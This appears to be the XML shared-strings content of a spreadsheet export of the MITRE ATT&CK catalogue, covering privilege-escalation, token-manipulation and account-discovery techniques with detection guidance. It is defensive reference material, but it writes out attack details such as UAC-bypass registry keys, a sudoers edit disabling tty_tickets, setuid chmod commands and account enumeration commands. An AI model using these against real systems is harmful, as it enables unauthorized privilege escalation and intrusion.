    <t>[zwShell](https://attack.mitre.org/software/S0350) is a remote access tool (RAT) written in Delphi that has been used by [Night Dragon](https://attack.mitre.org/groups/G0014).(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0350</t>
  </si>
  <si>
    <t>tactics</t>
  </si>
  <si>
    <t>detection</t>
  </si>
  <si>
    <t>data sources</t>
  </si>
  <si>
    <t>is sub-technique</t>
  </si>
  <si>
    <t>sub-technique of</t>
  </si>
  <si>
    <t>permissions required</t>
  </si>
  <si>
    <t>defenses bypassed</t>
  </si>
  <si>
    <t>supports remote</t>
  </si>
  <si>
    <t>T1548</t>
  </si>
  <si>
    <t>Abuse Elevation Control Mechanism</t>
  </si>
  <si>
    <t>Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1548</t>
  </si>
  <si>
    <t>30 January 2020</t>
  </si>
  <si>
    <t>Defense Evasion, Privilege Escalation</t>
  </si>
  <si>
    <t>Monitor the file system for files that have the setuid or setgid bits set. Also look for any process API calls for behavior that may be indicative of [Process Injection](https://attack.mitre.org/techniques/T1055) and unusual loaded DLLs through [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), which indicate attempts to gain access to higher privileged processes. On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo).
Consider monitoring for &lt;code&gt;/usr/libexec/security_authtrampoline&lt;/code&gt; executions which may indicate that AuthorizationExecuteWithPrivileges is being executed. MacOS system logs may also indicate when AuthorizationExecuteWithPrivileges is being called. Monitoring OS API callbacks for the execution can also be a way to detect this behavior but requires specialized security tooling.
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
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Some UAC bypass methods rely on modifying specific, user-accessible Registry settings. Analysts should monitor Registry settings for unauthorized changes.</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Administrator, User</t>
  </si>
  <si>
    <t>T1548.002</t>
  </si>
  <si>
    <t>Abuse Elevation Control Mechanism: Bypass User Account Control</t>
  </si>
  <si>
    <t>Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action. (Citation: TechNet How UAC Works)
If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) objects without prompting the user through the UAC notification box. (Citation: TechNet Inside UAC) (Citation: MSDN COM Elevation) An example of this is use of [Rundll32](https://attack.mitre.org/techniques/T1218/011) to load a specifically crafted DLL which loads an auto-elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.(Citation: Davidson Windows)
Many methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods(Citation: Github UACMe) that have been discovered and implemented, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:
* &lt;code&gt;eventvwr.exe&lt;/code&gt; can auto-elevate and execute a specified binary or script.(Citation: enigma0x3 Fileless UAC Bypass)(Citation: Fortinet Fareit)
Another bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.(Citation: SANS UAC Bypass)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1548/002</t>
  </si>
  <si>
    <t>There are many ways to perform UAC bypasses when a user is in the local administrator group on a system, so it may be difficult to target detection on all variations. Efforts should likely be placed on mitigation and collecting enough information on process launches and actions that could be performed before and after a UAC bypass is performed. Monitor process API calls for behavior that may be indicative of [Process Injection](https://attack.mitre.org/techniques/T1055) and unusual loaded DLLs through [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), which indicate attempts to gain access to higher privileged processes.
Some UAC bypass methods rely on modifying specific, user-accessible Registry settings. For example:
* The &lt;code&gt;eventvwr.exe&lt;/code&gt; bypass uses the &lt;code&gt;[HKEY_CURRENT_USER]\Software\Classes\mscfile\shell\open\command&lt;/code&gt; Registry key.(Citation: enigma0x3 Fileless UAC Bypass)
* The &lt;code&gt;sdclt.exe&lt;/code&gt; bypass uses the &lt;code&gt;[HKEY_CURRENT_USER]\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe&lt;/code&gt; and &lt;code&gt;[HKEY_CURRENT_USER]\Software\Classes\exefile\shell\runas\command\isolatedCommand&lt;/code&gt; Registry keys.(Citation: enigma0x3 sdclt app paths)(Citation: enigma0x3 sdclt bypass)
Analysts should monitor these Registry settings for unauthorized changes.</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Casey Smith; Stefan Kanthak</t>
  </si>
  <si>
    <t>Windows User Account Control</t>
  </si>
  <si>
    <t>T1548.004</t>
  </si>
  <si>
    <t>Abuse Elevation Control Mechanism: Elevated Execution with Prompt</t>
  </si>
  <si>
    <t>Adversaries may leverage the &lt;code&gt;AuthorizationExecuteWithPrivileges&lt;/code&gt; API to escalate privileges by prompting the user for credentials.(Citation: AppleDocs AuthorizationExecuteWithPrivileges) The purpose of this API is to give application developers an easy way to perform operations with root privileges, such as for application installation or updating. This API does not validate that the program requesting root privileges comes from a reputable source or has been maliciously modified. 
Although this API is deprecated, it still fully functions in the latest releases of macOS. When calling this API, the user will be prompted to enter their credentials but no checks on the origin or integrity of the program are made. The program calling the API may also load world writable files which can be modified to perform malicious behavior with elevated privileges.
Adversaries may abuse &lt;code&gt;AuthorizationExecuteWithPrivileges&lt;/code&gt; to obtain root privileges in order to install malicious software on victims and install persistence mechanisms.(Citation: Death by 1000 installers; it's all broken!)(Citation: Carbon Black Shlayer Feb 2019)(Citation: OSX Coldroot RAT) This technique may be combined with [Masquerading](https://attack.mitre.org/techniques/T1036) to trick the user into granting escalated privileges to malicious code.(Citation: Death by 1000 installers; it's all broken!)(Citation: Carbon Black Shlayer Feb 2019) This technique has also been shown to work by modifying legitimate programs present on the machine that make use of this API.(Citation: Death by 1000 installers; it's all broken!)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1548/004</t>
  </si>
  <si>
    <t>Consider monitoring for &lt;code&gt;/usr/libexec/security_authtrampoline&lt;/code&gt; executions which may indicate that &lt;code&gt;AuthorizationExecuteWithPrivileges&lt;/code&gt; is being executed. MacOS system logs may also indicate when &lt;code&gt;AuthorizationExecuteWithPrivileges&lt;/code&gt; is being called. Monitoring OS API callbacks for the execution can also be a way to detect this behavior but requires specialized security tooling.</t>
  </si>
  <si>
    <t>Process: OS API Execution, Process: Process Creation</t>
  </si>
  <si>
    <t>Erika Noerenberg, @gutterchurl, Carbon Black; Jimmy Astle, @AstleJimmy, Carbon Black</t>
  </si>
  <si>
    <t>T1548.001</t>
  </si>
  <si>
    <t>Abuse Elevation Control Mechanism: Setuid and Setgid</t>
  </si>
  <si>
    <t>An adversary may perform shell escapes or exploit vulnerabilities in an application with the setsuid or setgid bits to get code running in a different user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application, the application will run with the privileges of the owning user or group respectively. (Citation: setuid man page). Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them doesn’t need the elevated privileges.
Instead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications. These bits are indicated with an "s" instead of an "x" when viewing a file's attributes via &lt;code&gt;ls -l&lt;/code&gt;. The &lt;code&gt;chmod&lt;/code&gt; program can set these bits with via bitmasking, &lt;code&gt;chmod 4777 [file]&lt;/code&gt; or via shorthand naming, &lt;code&gt;chmod u+s [file]&lt;/code&gt;.
Adversaries can use this mechanism on their own malware to make sure they're able to execute in elevated contexts in the future.(Citation: OSX Keydnap malware).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1548/001</t>
  </si>
  <si>
    <t>Monitor the file system for files that have the setuid or setgid bits set. Monitor for execution of utilities, like chmod, and their command-line arguments to look for setuid or setguid bits being set.</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Metadata, File: File Modification</t>
  </si>
  <si>
    <t>User</t>
  </si>
  <si>
    <t>T1548.003</t>
  </si>
  <si>
    <t>Abuse Elevation Control Mechanism: Sudo and Sudo Caching</t>
  </si>
  <si>
    <t>Adversaries may perform sudo caching and/or use the suoders file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.
Within Linux and MacOS systems, sudo (sometimes referred to as "superuser do") allows users to perform commands from terminals with elevated privileges and to control who can perform these commands on the system. The &lt;code&gt;sudo&lt;/code&gt; command "allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments."(Citation: sudo man page 2018) Since sudo was made for the system administrator, it has some useful configuration features such as a &lt;code&gt;timestamp_timeout&lt;/code&gt;, which is the amount of time in minutes between instances of &lt;code&gt;sudo&lt;/code&gt; before it will re-prompt for a password. This is because &lt;code&gt;sudo&lt;/code&gt; has the ability to cache credentials for a period of time. Sudo creates (or touches) a file at &lt;code&gt;/var/db/sudo&lt;/code&gt; with a timestamp of when sudo was last run to determine this timeout. Additionally, there is a &lt;code&gt;tty_tickets&lt;/code&gt; variable that treats each new tty (terminal session) in isolation. This means that, for example, the sudo timeout of one tty will not affect another tty (you will have to type the password again).
The sudoers file, &lt;code&gt;/etc/sudoers&lt;/code&gt;, describes which users can run which commands and from which terminals. This also describes which commands users can run as other users or groups. This provides the principle of least privilege such that users are running in their lowest possible permissions for most of the time and only elevate to other users or permissions as needed, typically by prompting for a password. However, the sudoers file can also specify when to not prompt users for passwords with a line like &lt;code&gt;user1 ALL=(ALL) NOPASSWD: ALL&lt;/code&gt; (Citation: OSX.Dok Malware). Elevated privileges are required to edit this file though.
Adversaries can also abuse poor configurations of these mechanisms to escalate privileges without needing the user's password. For example, &lt;code&gt;/var/db/sudo&lt;/code&gt;'s timestamp can be monitored to see if it falls within the &lt;code&gt;timestamp_timeout&lt;/code&gt; range. If it does, then malware can execute sudo commands without needing to supply the user's password. Additional, if &lt;code&gt;tty_tickets&lt;/code&gt; is disabled, adversaries can do this from any tty for that user.
In the wild, malware has disabled &lt;code&gt;tty_tickets&lt;/code&gt; to potentially make scripting easier by issuing &lt;code&gt;echo \'Defaults !tty_tickets\' &gt;&gt; /etc/sudoers&lt;/code&gt; (Citation: cybereason osx proton). In order for this change to be reflected, the malware also issued &lt;code&gt;killall Terminal&lt;/code&gt;. As of macOS Sierra, the sudoers file has &lt;code&gt;tty_tickets&lt;/code&gt; enabled by default.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1548/003</t>
  </si>
  <si>
    <t>On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo). This technique is abusing normal functionality in macOS and Linux systems, but sudo has the ability to log all input and output based on the &lt;code&gt;LOG_INPUT&lt;/code&gt; and &lt;code&gt;LOG_OUTPUT&lt;/code&gt; directives in the &lt;code&gt;/etc/sudoers&lt;/code&gt; file.</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Modification, Process: Process Creation, Process: Process Metadata</t>
  </si>
  <si>
    <t>T1134</t>
  </si>
  <si>
    <t>Access Token Manipulation</t>
  </si>
  <si>
    <t>Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
An adversary can use built-in Windows API functions to copy access tokens from existing processes; this is known as token stealing. These token can then be applied to an existing process (i.e. [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001)) or used to spawn a new process (i.e. [Create Process with Token](https://attack.mitre.org/techniques/T1134/002)). An adversary must already be in a privileged user context (i.e. administrator) to steal a token. However, adversaries commonly use token stealing to elevate their security context from the administrator level to the SYSTEM level. An adversary can then use a token to authenticate to a remote system as the account for that token if the account has appropriate permissions on the remote system.(Citation: Pentestlab Token Manipulation)
Any standard user can use the &lt;code&gt;runas&lt;/code&gt; command, and the Windows API functions, to create impersonation tokens; it does not require access to an administrator account. There are also other mechanisms, such as Active Directory fields, that can be used to modify access tokens.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1134</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</si>
  <si>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There are many Windows API calls a payload can take advantage of to manipulate access tokens (e.g., &lt;code&gt;LogonUser&lt;/code&gt; (Citation: Microsoft LogonUser), &lt;code&gt;DuplicateTokenEx&lt;/code&gt;(Citation: Microsoft DuplicateTokenEx), and &lt;code&gt;ImpersonateLoggedOnUser&lt;/code&gt;(Citation: Microsoft ImpersonateLoggedOnUser)). Please see the referenced Windows API pages for more information.
Query systems for process and thread token information and look for inconsistencies such as user owns processes impersonating the local SYSTEM account.(Citation: BlackHat Atkinson Winchester Token Manipulation)
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t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata</t>
  </si>
  <si>
    <t>Jared Atkinson, @jaredcatkinson; Robby Winchester, @robwinchester3; Tom Ueltschi @c_APT_ure; Travis Smith, Tripwire</t>
  </si>
  <si>
    <t>File system access controls, Heuristic Detection, Host forensic analysis, System access controls, Windows User Account Control</t>
  </si>
  <si>
    <t>T1134.002</t>
  </si>
  <si>
    <t>Access Token Manipulation: Create Process with Token</t>
  </si>
  <si>
    <t>Adversaries may create a new process with a duplicated token to escalate privileges and bypass access controls. An adversary can duplicate a desired access token with &lt;code&gt;DuplicateToken(Ex)&lt;/code&gt; and use it with &lt;code&gt;CreateProcessWithTokenW&lt;/code&gt; to create a new process running under the security context of the impersonated user. This is useful for creating a new process under the security context of a different user.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1134/002</t>
  </si>
  <si>
    <t>18 February 2020</t>
  </si>
  <si>
    <t>26 March 2020</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</si>
  <si>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&lt;code&gt;DuplicateToken(Ex)&lt;/code&gt; and &lt;code&gt;CreateProcessWithTokenW&lt;/code&gt; and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: OS API Execution</t>
  </si>
  <si>
    <t>File system access controls, System access controls, Windows User Account Control</t>
  </si>
  <si>
    <t>T1134.003</t>
  </si>
  <si>
    <t>Access Token Manipulation: Make and Impersonate Token</t>
  </si>
  <si>
    <t>Adversaries may make and impersonate tokens to escalate privileges and bypass access controls. If an adversary has a username and password but the user is not logged onto the system, the adversary can then create a logon session for the user using the &lt;code&gt;LogonUser&lt;/code&gt; function. The function will return a copy of the new session's access token and the adversary can use &lt;code&gt;SetThreadToken&lt;/code&gt; to assign the token to a thread.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1134/003</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</si>
  <si>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If an adversary is using a payload that calls the Windows token APIs directly, analysts can detect token manipulation only through careful analysis of user network activity, examination of running processes, and correlation with other endpoint and network behavior.
Analysts can also monitor for use of Windows APIs such as &lt;code&gt;LogonUser&lt;/code&gt; and &lt;code&gt; SetThreadToken&lt;/code&gt; and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.</t>
  </si>
  <si>
    <t>T1134.004</t>
  </si>
  <si>
    <t>Access Token Manipulation: Parent PID Spoofing</t>
  </si>
  <si>
    <t>Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. One way of explicitly assigning the PPID of a new process is via the &lt;code&gt;CreateProcess&lt;/code&gt; API call, which supports a parameter that defines the PPID to use.(Citation: DidierStevens SelectMyParent Nov 2009) This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via &lt;code&gt;svchost.exe&lt;/code&gt; or &lt;code&gt;consent.exe&lt;/code&gt;) rather than the current user context.(Citation: Microsoft UAC Nov 2018)
Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be &lt;code&gt;explorer.exe&lt;/code&gt; rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as &lt;code&gt;lsass.exe&lt;/code&gt;), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1134/004</t>
  </si>
  <si>
    <t>Look for inconsistencies between the various fields that store PPID information, such as the EventHeader ProcessId from data collected via Event Tracing for Windows (ETW), Creator Process ID/Name from Windows event logs, and the ProcessID and ParentProcessID (which are also produced from ETW and other utilities such as Task Manager and Process Explorer). The ETW provided EventHeader ProcessId identifies the actual parent process.(Citation: CounterCept PPID Spoofing Dec 2018)
Monitor and analyze API calls to &lt;code&gt;CreateProcess&lt;/code&gt;/&lt;code&gt;CreateProcessA&lt;/code&gt;, specifically those from user/potentially malicious processes and with parameters explicitly assigning PPIDs (ex: the Process Creation Flags of 0x8XXX, indicating that the process is being created with extended startup information(Citation: Microsoft Process Creation Flags May 2018)). Malicious use of &lt;code&gt;CreateProcess&lt;/code&gt;/&lt;code&gt;CreateProcessA&lt;/code&gt; may also be proceeded by a call to &lt;code&gt;UpdateProcThreadAttribute&lt;/code&gt;, which may be necessary to update process creation attributes.(Citation: Secuirtyinbits Ataware3 May 2019) This may generate false positives from normal UAC elevation behavior, so compare to a system baseline/understanding of normal system activity if possible.</t>
  </si>
  <si>
    <t>Process: OS API Execution, Process: Process Creation, Process: Process Metadata</t>
  </si>
  <si>
    <t>Wayne Silva, F-Secure Countercept</t>
  </si>
  <si>
    <t>Heuristic Detection, Host forensic analysis</t>
  </si>
  <si>
    <t>T1134.005</t>
  </si>
  <si>
    <t>Access Token Manipulation: SID-History Injection</t>
  </si>
  <si>
    <t>Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).
With Domain Administrator (or equivalent) rights, harvested or well-known SID values (Citation: Microsoft Well Known SIDs Jun 2017) may be inserted into SID-History to enable impersonation of arbitrary users/groups such as Enterprise Administrators. This manipulation may result in elevated access to local resources and/or access to otherwise inaccessible domains via lateral movement techniques such as [Remote Services](https://attack.mitre.org/techniques/T1021), [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002), or [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1134/005</t>
  </si>
  <si>
    <t>Examine data in user’s SID-History attributes using the PowerShell &lt;code&gt;Get-ADUser&lt;/code&gt; cmdlet (Citation: Microsoft Get-ADUser), especially users who have SID-History values from the same domain. (Citation: AdSecurity SID History Sept 2015) Also monitor account management events on Domain Controllers for successful and failed changes to SID-History. (Citation: AdSecurity SID History Sept 2015) (Citation: Microsoft DsAddSidHistory)
Monitor for Windows API calls to the &lt;code&gt;DsAddSidHistory&lt;/code&gt; function. (Citation: Microsoft DsAddSidHistory)</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Modification, Process: OS API Execution, User Account: User Account Metadata</t>
  </si>
  <si>
    <t>Alain Homewood, Insomnia Security; Vincent Le Toux</t>
  </si>
  <si>
    <t>Administrator, SYSTEM</t>
  </si>
  <si>
    <t>T1134.001</t>
  </si>
  <si>
    <t>Access Token Manipulation: Token Impersonation/Theft</t>
  </si>
  <si>
    <t>Adversaries may duplicate then impersonate another user's token to escalate privileges and bypass access controls. An adversary can create a new access token that duplicates an existing token using &lt;code&gt;DuplicateToken(Ex)&lt;/code&gt;. The token can then be used with &lt;code&gt;ImpersonateLoggedOnUser&lt;/code&gt; to allow the calling thread to impersonate a logged on user's security context, or with &lt;code&gt;SetThreadToken&lt;/code&gt; to assign the impersonated token to a thread.
An adversary may do this when they have a specific, existing process they want to assign the new token to. For example, this may be useful for when the target user has a non-network logon session on the system.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1134/001</t>
  </si>
  <si>
    <t>If an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the &lt;code&gt;runas&lt;/code&gt; command. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging)
Analysts can also monitor for use of Windows APIs such as &lt;code&gt;DuplicateToken(Ex)&lt;/code&gt;, &lt;code&gt; ImpersonateLoggedOnUser &lt;/code&gt;, and &lt;code&gt; SetThreadToken &lt;/code&gt; and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.</t>
  </si>
  <si>
    <t>T1531</t>
  </si>
  <si>
    <t>Account Access Removal</t>
  </si>
  <si>
    <t>Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts.
Adversaries may also subsequently log off and/or reboot boxes to set malicious changes into place.(Citation: CarbonBlack LockerGoga 2019)(Citation: Unit42 LockerGoga 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1531</t>
  </si>
  <si>
    <t>09 October 2019</t>
  </si>
  <si>
    <t>14 July 2020</t>
  </si>
  <si>
    <t>Impact</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and command line parameters of binaries involved in deleting accounts or changing passwords, such as use of [Net](https://attack.mitre.org/software/S0039). Windows event logs may also designate activity associated with an adversary's attempt to remove access to an account:
* Event ID 4723 - An attempt was made to change an account's password
* Event ID 4724 - An attempt was made to reset an account's password
* Event ID 4726 - A user account was deleted
* Event ID 4740 - A user account was locked out
Alerting on [Net](https://attack.mitre.org/software/S0039) and these Event IDs may generate a high degree of false positives, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Modification, User Account: User Account Deletion, User Account: User Account Modification</t>
  </si>
  <si>
    <t>T1087</t>
  </si>
  <si>
    <t>Account Discovery</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1087</t>
  </si>
  <si>
    <t>Discovery</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</si>
  <si>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enumerate user accounts, such as &lt;code&gt;net.exe&lt;/code&gt; and &lt;code&gt;net1.exe&lt;/code&gt;, especially when executed in quick succession.(Citation: Elastic - Koadiac Detection with EQL)</t>
  </si>
  <si>
    <t>Azure AD, Google Workspace, IaaS, Linux, Office 365, SaaS, Windows, macOS</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, Process: Process Creation, User Account: User Account Metadata</t>
  </si>
  <si>
    <t>Daniel Stepanic, Elastic; Microsoft Threat Intelligence Center (MSTIC); Travis Smith, Tripwire</t>
  </si>
  <si>
    <t>T1087.004</t>
  </si>
  <si>
    <t>Account Discovery: Cloud Account</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of cloud accounts. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application.
With authenticated access there are several tools that can be used to find accounts. The &lt;code&gt;Get-MsolRoleMember&lt;/code&gt; PowerShell cmdlet can be used to obtain account names given a role or permissions group in Office 365.(Citation: Microsoft msolrolemember)(Citation: GitHub Raindance) The Azure CLI (AZ CLI) also provides an interface to obtain user accounts with authenticated access to a domain. The command &lt;code&gt;az ad user list&lt;/code&gt; will list all users within a domain.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018) 
The AWS command &lt;code&gt;aws iam list-users&lt;/code&gt; may be used to obtain a list of users in the current account while &lt;code&gt;aws iam list-roles&lt;/code&gt; can obtain IAM roles that have a specified path prefix.(Citation: AWS List Roles)(Citation: AWS List Users) In GCP, &lt;code&gt;gcloud iam service-accounts list&lt;/code&gt; and &lt;code&gt;gcloud projects get-iam-policy&lt;/code&gt; may be used to obtain a listing of service accounts and users in a project.(Citation: Google Cloud - IAM Servie Accounts List API)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1087/004</t>
  </si>
  <si>
    <t>21 February 2020</t>
  </si>
  <si>
    <t>16 March 2021</t>
  </si>
  <si>
    <t>Monitor processes, command-line arguments, and logs for actions that could be taken to gather information about cloud accounts, including the use of calls to cloud APIs that perform account discovery.
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment, and also to an extent in normal network operations. Therefore discovery data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.</t>
  </si>
  <si>
    <t>Azure AD, Google Workspace, IaaS, Office 365, SaaS</t>
  </si>
  <si>
    <t>Command: Command Execution, User Account: User Account Metadata</t>
  </si>
  <si>
    <t>Praetorian</t>
  </si>
  <si>
    <t>T1087.002</t>
  </si>
  <si>
    <t>Account Discovery: Domain Account</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior.
Commands such as &lt;code&gt;net user /domain&lt;/code&gt; and &lt;code&gt;net group /domain&lt;/code&gt; of the [Net](https://attack.mitre.org/software/S0039) utility, &lt;code&gt;dscacheutil -q group&lt;/code&gt;on macOS, and &lt;code&gt;ldapsearch&lt;/code&gt; on Linux can list domain users and groups.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1087/002</t>
  </si>
  <si>
    <t xml:space="preserve">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t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation</t>
  </si>
  <si>
    <t>T1087.003</t>
  </si>
  <si>
    <t>Account Discovery: Email Account</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of email addresses and accounts. Adversaries may try to dump Exchange address lists such as global address lists (GALs).(Citation: Microsoft Exchange Address Lists)
In on-premises Exchange and Exchange Online, the&lt;code&gt;Get-GlobalAddressList&lt;/code&gt; PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)
In Google Workspace, the GAL is shared with Microsoft Outlook users through the Google Workspace Sync for Microsoft Outlook (GWSMO) service. Additionally, the Google Workspace Directory allows for users to get a listing of other users within the organization.(Citation: Google Workspace Global Access List)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1087/003</t>
  </si>
  <si>
    <t>31 March 2021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</si>
  <si>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</si>
  <si>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Google Workspace, Office 365, Windows</t>
  </si>
  <si>
    <t>T1087.001</t>
  </si>
  <si>
    <t>Account Discovery: Local Account</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.
Commands such as &lt;code&gt;net user&lt;/code&gt; and &lt;code&gt;net localgroup&lt;/code&gt; of the [Net](https://attack.mitre.org/software/S0039) utility and &lt;code&gt;id&lt;/code&gt; and &lt;code&gt;groups&lt;/code&gt;on macOS and Linux can list local users and groups. On Linux, local users can also be enumerated through the use of the &lt;code&gt;/etc/passwd&lt;/code&gt; file.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1087/001</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, Process: Process Creation</t>
  </si>
  <si>
    <t>Daniel Stepanic, Elastic</t>
  </si>
  <si>
    <t>T1098</t>
  </si>
  <si>
    <t>Account Manipulation</t>
  </si>
  <si>
    <t>Adversaries may manipulate accounts to maintain access to victim systems. Account manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups. These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to bypass password duration policies and preserve the life of compromised credentials. In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1098</t>
  </si>
  <si>
    <t>Persistence</t>
  </si>
  <si>
